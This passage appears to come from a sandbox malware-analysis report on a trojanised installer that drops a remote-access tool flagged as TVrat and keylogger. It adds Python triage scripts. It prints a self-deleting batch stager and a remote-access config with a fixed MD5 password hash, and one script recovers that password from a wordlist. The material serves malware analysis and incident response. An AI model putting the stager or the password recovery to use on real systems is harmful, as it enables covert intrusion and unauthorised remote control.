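from collections import Counter


def entropy_8bit(data):
    """Shannon entropy in bits per byte: the 'Entropy (8bit)' value in the listing.
    0.0 = a single repeated byte value, 8.0 = uniform; packed or encrypted payloads
    sit near 8, typical compiled code sits around 6 to 7."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def file_hashes(data):
    """Upper-case hex digests, matching the listing's MD5 / SHA1 / SHA-256 rows."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
    }


def dos_stub_kind(data):
    """Classify the DOS stub text seen at the start of each PE preview.
    The linker attribution is a heuristic used by this example."""
    head = data[:0x200]
    if head[:2] != b"MZ":
        return "not-pe"
    if head[:3] == b"MZP" and b"This program must be run under Win32" in head:
        return "borland-delphi"   # Delphi/Borland linker stub (Inno Setup, Delphi apps)
    if b"This program cannot be run in DOS mode" in head:
        return "microsoft"        # Microsoft linker stub
    return "unknown-stub"


def pe_sections(data):
    """Walk the COFF section table; return (name, raw_size, raw_entropy) per section."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size            # section table follows the optional header
    sections = []
    for i in range(nsections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", data, table + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         raw_size, round(entropy_8bit(raw), 3)))
    return sections


def triage_pe(data):
    """One dict per file, in the same spirit as a dropped-file entry above."""
    return {"size": len(data), "entropy": round(entropy_8bit(data), 3),
            "stub": dos_stub_kind(data), "sections": pe_sections(data),
            **file_hashes(data)}


def build_sample_pe(sig=b"MZP", stub_msg=b"This program must be run under Win32"):
    """Constructed minimal PE (no optional header, two sections) for offline runs.
    It is not one of the dropped files above and is not executable."""
    dos = bytearray(0x40)
    dos[:len(sig)] = sig
    stub = stub_msg + b"\r\n$"
    e_lfanew = (0x40 + len(stub) + 7) & ~7          # 8-byte aligned PE header offset
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    header = (bytes(dos) + stub).ljust(e_lfanew, b"\0")
    blobs = [(b".text", bytes(range(256)) * 4),     # uniform bytes -> 8.0 bits
             (b".data", b"A" * 1024)]               # single byte value -> 0.0 bits
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(blobs), 0, 0, 0, 0, 0x0102)
    raw_ptr = e_lfanew + 24 + 40 * len(blobs)
    table = b""
    for name, blob in blobs:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(blob),
                             0x1000, len(blob), raw_ptr, 0, 0, 0, 0, 0x60000020)
        raw_ptr += len(blob)
    return header + coff + table + b"".join(blob for _, blob in blobs)


if __name__ == "__main__":
    for key, value in triage_pe(build_sample_pe()).items():
        print(f"{key}: {value}")
```

Run it against a real dropped file with `triage_pe(open(path, "rb").read())`; a section whose raw entropy is well above the file's overall value is the usual place to start looking for an embedded or encrypted payload.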
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):581304
                                                                                                                          Entropy (8bit):6.580382227041057
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                          MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                          SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                          SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                          SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}..O}..O}..O.|*Ol..O.|(O...O.|)Oc..O/..Nd..O/..N...O/..N_..O...Ol..O}..O...O..Nh..O..N|..O.$O|..O}.LO|..O..N|..ORich}..O........PE..L...L..a...........!..... ...........m.......0......................................C.....@.........................0...P...............0................$.......[......p..............................@............0...............................text............ .................. ..`.rdata..H....0.......$..............@..@.data....d... ...D..................@....rsrc...0............X..............@..@.reloc...[.......\...^..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1724088
                                                                                                                          Entropy (8bit):6.573221633911959
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
                                                                                                                          MD5:E0E559010A1CC7CB6B6F754E8833A156
                                                                                                                          SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
                                                                                                                          SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
                                                                                                                          SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....5k.o....5i.....5h.h.......Y...w...:...........%...l...%.......%...R....VQ.d...w................v.....e.v...w...v.......v...Richw...........PE..L..._..`...........!.....@...B...............P......................................Q.....@.........................@Z..H....Z..........(............*...$... ..........p...........................P...@............P..|............................text....>.......@.................. ..`.rdata..(....P... ...D..............@..@.data........p...2...d..............@....rodata.@...........................@..@.rsrc...(...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):17648
                                                                                                                          Entropy (8bit):6.317642988990049
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                          MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                          SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                          SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                          SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......):5.m[[.m[[.m[[.d#..o[[.d#..c[[.d#..o[[.d#..j[[.m[Z.S[[.d#..k[[.d#..l[[.d#..l[[.Richm[[.........PE..L......K...........!.........................0...............................p............@..........................<..N...|6..P....P...............0.......`..$....................................4..@............0...............................text...;........................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):586
                                                                                                                          Entropy (8bit):5.193353768565217
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:LzSeQNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:HSeWlcMypJD5KxkiaJosBq
                                                                                                                          MD5:CAA0C19D802D86B5A6B290897AA864EE
                                                                                                                          SHA1:01C139425983B9EC2A8FE42C9D685D1193D5A8BB
                                                                                                                          SHA-256:EDEECC1090C314D7397B171CD09E1C208FCCE3B580794BAC425475E4292629FA
                                                                                                                          SHA-512:95B595038F720A45449E77E121B0AF3FFA251034EFD6F187C8572C54F667D11F467AF6A5F062F50B60C8001645CA33B5F204482753AF72BDD2AA3A3834BD2C35
                                                                                                                          Malicious:false
                                                                                                                          Preview:[config]..Security.FixPass=96E79218965EB72C92A549DD5A330112..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..
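The [config] file above is an INI-style settings file for the remote-access component. The settings that matter for triage are Security.UNCONTROLLED_ACCESS=1, Security.DynPassKind=0 together with Security.PassLifetime=0 (a fixed password that never rotates), Main.Autorun=1, Main.CheckUpdates=0 and Security.DenyRemoteSettingsControl=0; Security.FixPass holds a 32-hex-digit value, which has the shape of an unsalted MD5. The script below is an added example, not part of the report or of the tool's own code: it parses the block (accepting both CRLF and the report's ".." line separators), flags those settings, and tests the FixPass value against a small constructed wordlist. The reading of each key as risky and the assumption that FixPass is an unsalted MD5 are this example's; the wordlist hit is what confirms the latter.

```python
import hashlib
import re

# Constructed sample: the [config] text from the dropped-file preview above,
# with the report's ".." line separators expanded back to CRLF.
SAMPLE_CONFIG = (
    "[config]\r\n"
    "Security.FixPass=96E79218965EB72C92A549DD5A330112\r\n"
    "Main.Autorun=1\r\n"
    "Main.CloseButtonOperation=0\r\n"
    "Main.CheckUpdates=0\r\n"
    "Security.UseLocalSecuritySettings=1\r\n"
    "Security.DynPassKind=0\r\n"
    "Security.PassLifetime=0\r\n"
    "Security.CanWinAuth=1\r\n"
    "Security.AccessKind=1\r\n"
    "Security.CanWinLoginAnotherUser=1\r\n"
    "Security.UNCONTROLLED_ACCESS=1\r\n"
    "Security.CanWinLoginNotAdmin=1\r\n"
    "Security.DenyRemoteSettingsControl=0\r\n"
    "Security.DenyLockControls=0\r\n"
    "Log.ServerStoreTechLog=0\r\n"
    "Main.AWAYMODE_REQUIRED=1\r\n"
    "Main.LogsLifetime=1\r\n"
    "Main.LogsForMail2Support=1\r\n"
    "ProxySettings.UseKind=1\r\n"
    "ProxySettings.StoreUserAndPassw=1\r\n"
)

# Key/value pairs that indicate unattended, non-interactive remote control.
# Key names come from the dropped file; the interpretation is this example's.
RISKY = {
    "Security.UNCONTROLLED_ACCESS": "1",
    "Security.DynPassKind": "0",            # no dynamic / one-time password
    "Security.PassLifetime": "0",           # fixed password never expires
    "Main.Autorun": "1",
    "Main.CheckUpdates": "0",
    "Security.DenyRemoteSettingsControl": "0",
}

# Small constructed wordlist; a real triage run would use a proper list.
WORDLIST = ["password", "123456", "12345678", "111111", "qwerty", "admin"]


def parse_config(text):
    """Parse the INI-like block into {key: value}.
    Accepts CRLF, LF, or the '..' separator the sandbox preview uses."""
    settings = {}
    for line in re.split(r"\r\n|\r|\n|\.\.", text):
        line = line.strip()
        if not line or (line.startswith("[") and line.endswith("]")):
            continue                      # skip blanks and the [config] header
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip()] = value.strip()
    return settings


def risky_settings(settings):
    """Return the subset of RISKY that is present with the flagged value."""
    return {k: settings[k] for k, v in RISKY.items() if settings.get(k) == v}


def crack_fixpass(hash_hex, wordlist=WORDLIST):
    """Treat FixPass as an unsalted MD5 (assumption) and try a wordlist."""
    target = hash_hex.lower()
    if not re.fullmatch(r"[0-9a-f]{32}", target):
        return None
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == target:
            return candidate
    return None


def audit_config(text):
    settings = parse_config(text)
    return {
        "risky": risky_settings(settings),
        "fixpass_plain": crack_fixpass(settings.get("Security.FixPass", "")),
    }


if __name__ == "__main__":
    result = audit_config(SAMPLE_CONFIG)
    for key, value in result["risky"].items():
        print(f"risky: {key}={value}")
    print("FixPass recovered as:", result["fixpass_plain"])
```

If the wordlist check succeeds, the recovered value is the fixed access password the attacker would use to connect to this host unattended, and it is worth searching other hosts for config files carrying the same hash.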
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):10752
                                                                                                                          Entropy (8bit):7.9500738973365355
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Nr2Ya94sQ6EqghLbOU+fWt1t7ZPA+KAMcB6Bk0Nmd32iF2la8XncszJfBzG1:p2Ya94s8q8+fQttI+8cABGJ4la8vVfp6
                                                                                                                          MD5:15955D8B74435C9CA1A6E273644CE86B
                                                                                                                          SHA1:E43F73B27A7F76014706296339F4CE1C71C86EFE
                                                                                                                          SHA-256:796097E407FE8EB02A965CD5416DDAE0C1F178C153A71FCF8590F4BED4F5A389
                                                                                                                          SHA-512:38593F7523D416A4E0BC855F52BA76B1ABE1F65E912ED5E892DE4C210B0055B07472DA5B8C0CB731BC1E4B26C43FF2A346CE84B893907AB121EB74D6555296C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:......JFIF.................................................. ,$..) ..&6&).2333."9>;1=,230...........2)$)52222222222822222222222222222222222222222222222222...........".......................................F......................!.1..AQ."aq.2.Bb...#R....3r....C....$s.45DSt.................................(........................!1A"Q.a2q.................?..N....+..@S.W...@....+..../..8..5.=..}.kAD....>q....E..n.r./.Q..v......5..v.l....f?.s.....m.R.Z.......D..u...-....K..U...S.Xt ......^'... ...[gv....Xjm.*p$.~..n.LY.%.,@..x....|(...Z.X.Uk.1..=...u....U.1.L...@..-r......e...G.Vo.......Vb..P.y.A.....&v5..p..U#Sy.........X..+&-........../.k.A..0$..Jt..t.&.V.\u.q.+....."J..GH..o[.......Tjq"G..o..e.:H.h...:..Ah..=.H..J...V....Y...2.........{.;U.......`...Y..@..'`3....(.s.k..c...eY...03.'.T.V..e@..h \(..vI]...F....Fu.....'...g-.....-..;6L.i.N...W.-.f...WQ..@..ub;.=.[.r..|k......bL...i.o&..9..m..`....3...a...R.7%.=z..N.s.n.R..b;k......h.5M...h..Ay..........q
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):395
                                                                                                                          Entropy (8bit):4.596567576097278
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:hmR9ooW9rw49edspB7utcA2dcvNiccA2dx0HcA2d7DvDTfcA2djLvWVOzwaowQ4:w7Q249edaBS7jfxmfJ8WsQwH
                                                                                                                          MD5:21138C5F0FC42E27B57CBADC4CFCB7B7
                                                                                                                          SHA1:EBC7FB05FD67B43925EC4EE2A43A2F3152712B28
                                                                                                                          SHA-256:C8D896D8DAE872D0FF7ED407E9706E19F798FBADBA7AF7EF48E5EDDA4BF05C23
                                                                                                                          SHA-512:20D832E675D2AAB97DF7FC10BAD055F96327F782224C0A1C0F10C4D7CF01CCC7428AB934DA889935C2E67D6FAC959C1F52D796314988168844C5F079B55D67F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:@echo off..set "StartDirName=fat" ..set "TempDirName=qilq" ..set "BatchName=g3ll5lm.bat" ..set "ProcName=ast.exe" ......mkdir "%appdata%\%StartDirName%"..xcopy /Y /I /S "%~dp0*" "%appdata%\%StartDirName%\"..del /f /q "%appdata%\%StartDirName%\%BatchName%"..start "" "%appdata%\%StartDirName%\%ProcName%"..for /d %%i in (%temp%\%TempDirName%) do rd /s /q %%i..
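The batch file above is a staging script: it copies the directory it runs from into %appdata%\fat, deletes its own copy there, launches ast.exe from the new location, and removes the %temp%\qilq working directory. Because every path is assembled from set variables, such scripts are easier to read once the variables are resolved. The script below is an added example and not part of the report: it tracks set assignments, expands %VAR% references (leaving %~dp0 and unknown variables in place so the analyst can see them), and summarises the copy, delete, start and directory-removal actions, flagging the self-delete. The %appdata% and %temp% values it assumes are the standard locations for the report's C:\Users\user profile, not values read from the page.

```python
import re

# Constructed sample: the dropped batch file shown in the preview above, with
# the report's ".." line separators restored to line breaks.
SAMPLE_BAT = (
    '@echo off\r\n'
    'set "StartDirName=fat" \r\n'
    'set "TempDirName=qilq" \r\n'
    'set "BatchName=g3ll5lm.bat" \r\n'
    'set "ProcName=ast.exe" \r\n'
    '\r\n\r\n'
    'mkdir "%appdata%\\%StartDirName%"\r\n'
    'xcopy /Y /I /S "%~dp0*" "%appdata%\\%StartDirName%\\"\r\n'
    'del /f /q "%appdata%\\%StartDirName%\\%BatchName%"\r\n'
    'start "" "%appdata%\\%StartDirName%\\%ProcName%"\r\n'
    'for /d %%i in (%temp%\\%TempDirName%) do rd /s /q %%i\r\n'
)

# Assumed values for the sandbox user's environment (the report shows the
# profile path C:\Users\user\...); not taken from the page.
ASSUMED_ENV = {
    "appdata": r"C:\Users\user\AppData\Roaming",
    "temp": r"C:\Users\user\AppData\Local\Temp",
}

SET_RE = re.compile(r'^set\s+"?([^=\s"]+)=([^"]*)"?\s*$', re.IGNORECASE)
VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")   # %%i and %~dp0 do not match
QUOTED_RE = re.compile(r'"([^"]*)"')
FOR_IN_RE = re.compile(r"\bin\s*\(([^)]*)\)", re.IGNORECASE)


def resolve_batch(text, env=None):
    """Track 'set' assignments and expand %VAR% references line by line.
    cmd.exe variable names are case-insensitive, so keys are lower-cased.
    Unknown references (and argument modifiers like %~dp0) are left as-is."""
    variables = {k.lower(): v for k, v in (env or {}).items()}
    commands = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.lower().startswith("@echo"):
            continue
        m = SET_RE.match(line)
        if m:
            variables[m.group(1).lower()] = m.group(2)
            continue
        commands.append(VAR_RE.sub(
            lambda mm: variables.get(mm.group(1).lower(), mm.group(0)), line))
    return variables, commands


def triage_batch(text, env=None):
    """Summarise what the script drops, launches and cleans up."""
    variables, commands = resolve_batch(text, env)
    report = {"copies_to": [], "deletes": [], "starts": [], "removes_dirs": []}
    for cmd in commands:
        verb = cmd.split(None, 1)[0].lower()
        quoted = QUOTED_RE.findall(cmd)
        if verb == "xcopy" and quoted:
            report["copies_to"].append(quoted[-1])        # destination is last
        elif verb == "del" and quoted:
            report["deletes"].extend(quoted)
        elif verb == "start":
            targets = [q for q in quoted if q]            # first "" is the window title
            if targets:
                report["starts"].append(targets[-1])
        elif verb == "for":
            m = FOR_IN_RE.search(cmd)
            if m and re.search(r"\b(rd|rmdir)\b", cmd, re.IGNORECASE):
                report["removes_dirs"].append(m.group(1).strip())
    # A 'del' whose target is a .bat name held in a variable is a strong hint
    # that the script removes itself after staging the payload.
    bat_names = {v.lower() for v in variables.values() if v.lower().endswith(".bat")}
    report["self_delete"] = any(
        d.lower().rsplit("\\", 1)[-1] in bat_names for d in report["deletes"])
    return report


if __name__ == "__main__":
    for key, value in triage_batch(SAMPLE_BAT, ASSUMED_ENV).items():
        print(f"{key}: {value}")
```

The resolved "starts" entry is the path to hunt for on other hosts (here %appdata%\fat\ast.exe), and "removes_dirs" tells you which temporary directory will be gone by the time the disk is imaged, so volatile collection should target it first.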
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2236144
                                                                                                                          Entropy (8bit):5.624149670958732
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                          MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                          SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                          SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                          SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............}...}...}.K....}.K..._.}.K.....}...~..}...y..}.......}...|.W.}...x...}...x...}...}...}......}.......}.......}.Rich..}.................PE..L..."..[...........!.........x.......................................................,"...@.........................P.,.^....s-.P.....-.0.............".......-.....`.+.8...................@.+.......+.@............p-..............................textbss.T...............................text.......p...................... ..`.rdata....... '.....................@..@.data....`....-..@.... .............@....idata.......p-....... .............@..@.msvcjmc......-....... .............@....tls..........-....... .............@....00cfg........-....... .............@..@.rsrc...0.....-....... .............@..@.reloc........-....... .............@..B................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1388688
                                                                                                                          Entropy (8bit):6.85745413435775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                          MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                          SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                          SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                          SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......lU.*(4.y(4.y(4.y!L<y.4.y!L-y34.y(4.y.4.y...y#4.y(4.y=4.y!L;y.6.y!L*y)4.y!L,y)4.y!L)y)4.yRich(4.y................PE..L...#..]...........!.................................................................:...............................A.......6..x.......0...........................p...................................@...............(............................text............................... ..`.rdata..XY.......Z..................@..@.data............t..................@....rsrc...0............Z..............@..@.reloc..,............`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7543992
                                                                                                                          Entropy (8bit):6.717610928993395
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                          MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                          SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                          SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                          SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....@a..................K..`'.......K.......K...@...........................y.......s..........@............................S..m....X..f ...........r..$... T.8d............T...............T.....................@.S..............................text... .J.......J................. ..`.itext..$.....J.......J............. ..`.data...T"....K..$....K.............@....bss..........M.......M..................idata...m....S..n....M.............@....tls....D.....T......*N..................rdata..#.....T......*N.............@..@.reloc..8d... T..f...,N.............@..B.rsrc....f ...X..f ...R.............@..@..............y.......r.............@..@................................................................................................
Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):581304
Entropy (8bit):6.580382227041057
Encrypted:false
SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
MD5:CDC5A8221738C1CA66564755BB58138C
SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
Category:dropped
Size (bytes):10752
Entropy (8bit):7.9500738973365355
Encrypted:false
SSDEEP:192:Nr2Ya94sQ6EqghLbOU+fWt1t7ZPA+KAMcB6Bk0Nmd32iF2la8XncszJfBzG1:p2Ya94s8q8+fQttI+8cABGJ4la8vVfp6
MD5:15955D8B74435C9CA1A6E273644CE86B
SHA1:E43F73B27A7F76014706296339F4CE1C71C86EFE
SHA-256:796097E407FE8EB02A965CD5416DDAE0C1F178C153A71FCF8590F4BED4F5A389
SHA-512:38593F7523D416A4E0BC855F52BA76B1ABE1F65E912ED5E892DE4C210B0055B07472DA5B8C0CB731BC1E4B26C43FF2A346CE84B893907AB121EB74D6555296C8
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17648
Entropy (8bit):6.317642988990049
Encrypted:false
SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
MD5:ACF7048E2347CFD66CD17648DBFBAF45
SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2098416
Entropy (8bit):6.277915381502377
Encrypted:false
SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
MD5:1AFC9BD5E625E85B696141F62FBA4325
SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
